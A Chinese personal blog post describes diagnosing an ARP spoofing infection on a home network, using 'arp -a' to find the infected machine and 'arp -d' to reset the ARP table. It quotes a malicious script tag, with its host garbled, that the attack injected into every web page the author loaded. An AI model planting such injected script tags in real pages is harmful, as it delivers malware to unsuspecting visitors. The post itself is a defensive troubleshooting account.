又遇到ARP攻击
大概两周前,为小屋买了台路由器,于是可以两台电脑可以一起用猫上网了,可是隔壁的那台前阵子遇到问题,我帮着重装的系统,但没有装杀毒软件,这一举动造成了今天的相当郁闷的后果。
上午折腾了半天,仿制了一个个人觉得相当漂亮wordpress皮肤,具体页面都差不多了,相当高兴。下午的时候,把皮肤文件上传服务器,发现网页构成乱七八糟,都错位了,百思不得其解,又重新上传了一变,结果还是一样,可以在本地的服务器上却是好的。
万般无赖之际,仔细研究请求上传后的代码所获取网页的HTML源代码,结果发现第一条<html>标记之前就有一个<script>代码段:<script src=http://%E%F…/n.js></script>一段脚本,这显然是有问题,下载了不知名网站上的一个js文件,而这个js文件做什么的我就不知道了,用迅雷下了后是加过密的,懒得研究代码,但肯定不是友好代码。
起初怀疑我要安家虚拟主机被注入了,可按照wordpress的调用,查看了很多代码后没有发现可以代码,于是又陷入困境,正当一筹莫展之际,突然想起,会不会是自己电脑中毒的,于是随便打开一个网址mail.163.com,查看源代码,果然,也有那句该死的js脚本,二话没说,安全卫士360查木马,查恶意插件,一无所获。继续,卡巴斯基2008杀毒,等了许久,一个没查到。
只得到网上去搜,结果根据看了大量的文章说法,初步怀疑,中毒的不是自己的电脑,而是室友的电脑,而我的电脑暴露出来的问题,恰恰是室友电脑中了ARP病毒造成的,连接上外网,两台电脑都可以上外网,但是没办法互相ping通,为了确定到底是哪台机子中毒从网上搜得一个办法:在局域网内任意一台客户机上打开网上邻居,然后查看工作组,等列表刷新出后,迅速运行cmd,然后arp -a命令,如果有一台机子的MAC地址和网管的MAC地址,那么就是那台机子中毒了。我试了一下,果然室友的自己MAC地址跟网关一样,兴奋了一番。
接下来,我立刻拔了室友电脑与路由器连接的网线,还以为一切ok了,却发自己现上不了外网了,甚至连路由器都无法访问,这时想起,可以路由arp列表出问题了,于是一个 arp -d 命令 删除arp表后重建arp表,再试,一切OK。
11条评论▼